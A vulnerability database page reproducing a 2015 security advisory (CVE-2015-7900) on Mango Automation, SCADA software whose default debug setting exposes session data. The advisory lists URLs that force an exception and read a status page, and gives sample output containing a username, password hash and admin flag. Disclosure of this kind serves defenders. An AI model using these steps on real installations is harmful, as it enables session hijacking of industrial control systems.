Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability

🗓️ 26 Sep 2015 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 93 Views

Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability. Information disclosure vulnerability due to default debugging configuration, allowing access to sensitive user information and system details. Impact: Cross-Site Scripting, Exposure of Sensitive Information.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2015-7900
28 Oct 201510:59
attackerkb
CNVD		Infinite Automation Mango Automation Information Disclosure Vulnerability (CNVD-2015-07169)
30 Oct 201500:00
cnvd
CVE		CVE-2015-7900
28 Oct 201510:00
cve
Cvelist		CVE-2015-7900
28 Oct 201510:00
cvelist
EUVD		EUVD-2015-7798
7 Oct 202500:30
euvd
ICS		Infinite Automation Systems Mango Automation Vulnerabilities (Update A)
30 Jul 201506:00
ics
NVD		CVE-2015-7900
28 Oct 201510:59
nvd
Prion		Code injection
28 Oct 201510:59
prion
<html><body><p>Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability


Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)

Summary: Mango Automation is a flexible SCADA, HMI
And Automation software application that allows you
to view, log, graph, animate, alarm, and report on
data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.

Desc: Mango Automation suffers from information disclosure
vulnerability because it contains default configuration for
debugging enabled in the '/WEB-INF./web.xml' file (debug=true).
An attacker can entice a logged-in user to visit a specially
crafted URL which will produce a system exception with stack
trace on the Jetty server. When this error occurs, the debug
option generates a status page with all the information from
the visitor, meaning that the attacker is able to see usernames,
password hashes, e-mails and of course, Cookie sessions. Using
the generated error, the attacker can easily perform session
hijacking and take over the system using previously discovered
vulnerabilities by just visiting the status page non-authenticated.

Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
           Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
           Jetty(9.2.2.v20140723)
           Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
           Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php


20.08.2015

--


One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):

 - http://localhost:8080/status/
 
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:

 - http://localhost:8080/status/mango.json?time=$
 - http://localhost:8080/status/


Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n   sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, [email protected], phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n   LONG_POLL_DATA_TIMEOUT=1440143583487\r\n   LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n   DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n   constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n   constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n   constants.Permissions.DataPointAccessTypes.READ=1\r\n   org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n   constants.DataTypes.BINARY=1\r\n   constants.UserComment.TYPE_EVENT=1\r\n   constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n   javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n   


Also you can list all of the Classes known to DWR:

 - http://localhost:8080/dwr/index.html
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Sep 2015 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.12814
mango automationunprotected debug logcross-site scriptingexposure of sensitive informationinfinite automation systems inc.jettyjava runtime environmentvulnerabilityexploitzero science lab
93